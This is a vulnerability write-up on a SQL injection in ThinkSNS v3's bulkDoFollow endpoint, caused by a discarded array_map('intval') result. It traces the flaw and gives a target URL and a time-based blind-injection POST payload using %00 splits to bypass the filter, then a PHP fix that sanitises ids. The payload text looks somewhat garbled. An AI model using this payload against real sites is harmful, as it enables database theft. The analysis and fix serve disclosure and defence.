ThinkSNS defense bypass ideas (union select truly unrestricted SQL injection)
public function bulkDoFollow() {
    // security filter
    $res = $this->_follow_model->bulkDoFollow($this->mid, t($_POST['fids']));
    $this->ajaxReturn($res, $this->_follow_model->getError(), false !== $res);
}
Following bulkDoFollow into the model:
public function bulkDoFollow($uid, $fids) {
    $follow_states = $this->getFollowStateByFids($uid, $fids);
Then into getFollowStateByFids:
public function getFollowStateByFids($uid, $fids) {
    array_map('intval', $fids);
    $_fids = is_array($fids) ? implode(',', $fids) : $fids;
    if (empty($_fids)) {
        return array();
    }
    $follow_data = $this->where(" ( uid = '{$uid}' AND fid IN({$_fids}) ) OR ( uid IN({$_fids}) and fid = '{$uid}')")->findAll();
    $follow_states = $this->_formatFollowState($uid, $fids, $follow_data);
Look at this piece of logic:

array_map('intval', $fids);
$_fids = is_array($fids) ? implode(',', $fids) : $fids;

The return value of array_map() is thrown away, so $fids is never actually cast to integers. If fids is a string, array_map('intval', ",3") only emits a warning (it expects an array) and the program keeps running; because is_array($fids) is then false, the raw string is assigned to $_fids and interpolated straight into the IN(...) clause of the query.

This causes injection.
Request URL:

http://localhost/thinksns_v3.20.20131108_28822/index.php?app=public&mod=Follow&act=bulkDoFollow

POST data:
Fids = 00ct, if (ascii (substr (sele % user () fr % 00om ts_atme limit), slee % 00 p (3), 1) =, 1 )))#
With this, the entire site's database contents can be extracted blind.
Solution:

Filter the input properly: the integer cast has to be applied to $fids before it reaches the query, whether it arrives as an array or as a string.
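A hardened version of the id handling, added here as an illustration and not ThinkSNS code; the function names normalizeFids and buildFollowStateSql are hypothetical. It accepts the same array-or-string input as the original but lets only positive integer ids through to the SQL:

```php
<?php
// Added example (not ThinkSNS code). The original discards the result of
// array_map('intval', ...) and, for a string $fids, interpolates the raw
// string into the query. Here $fids is normalised to a list of positive
// integers first, so nothing but digits can reach the IN(...) clause.

function normalizeFids($fids): array {
    // Accept either an array or a comma-separated string, as the original does.
    if (!is_array($fids)) {
        $fids = explode(',', (string) $fids);
    }
    $clean = [];
    foreach ($fids as $fid) {
        // Require a pure decimal id rather than relying on intval(), which
        // silently truncates "3 OR 1=1" to 3 and hides bad input.
        if (is_int($fid) || (is_string($fid) && ctype_digit(trim($fid)))) {
            $id = (int) $fid;
            if ($id > 0) {
                $clean[$id] = $id; // keyed by id to drop duplicates
            }
        }
    }
    return array_values($clean);
}

function buildFollowStateSql(int $uid, array $cleanFids): string {
    if (empty($cleanFids)) {
        return '';
    }
    $in = implode(',', $cleanFids); // only integers from normalizeFids()
    return "( uid = {$uid} AND fid IN({$in}) ) OR ( uid IN({$in}) AND fid = {$uid} )";
}

// Constructed inputs: a normal array, a string with junk, a string carrying SQL.
$inputs = [
    ['1', '2', '2'],   // -> [1,2]
    '1,2,abc',         // -> [1,2]
    '5,1 OR 1=1',      // -> [5]
];
foreach ($inputs as $in) {
    $ids = normalizeFids($in);
    echo json_encode($in), ' -> ', json_encode($ids),
         ' SQL: ', buildFollowStateSql(7, $ids), "\n";
}
```

With the query layer's own placeholders (binding each id) the interpolation could be removed entirely; the minimal change shown keeps the page's query shape while closing the string path.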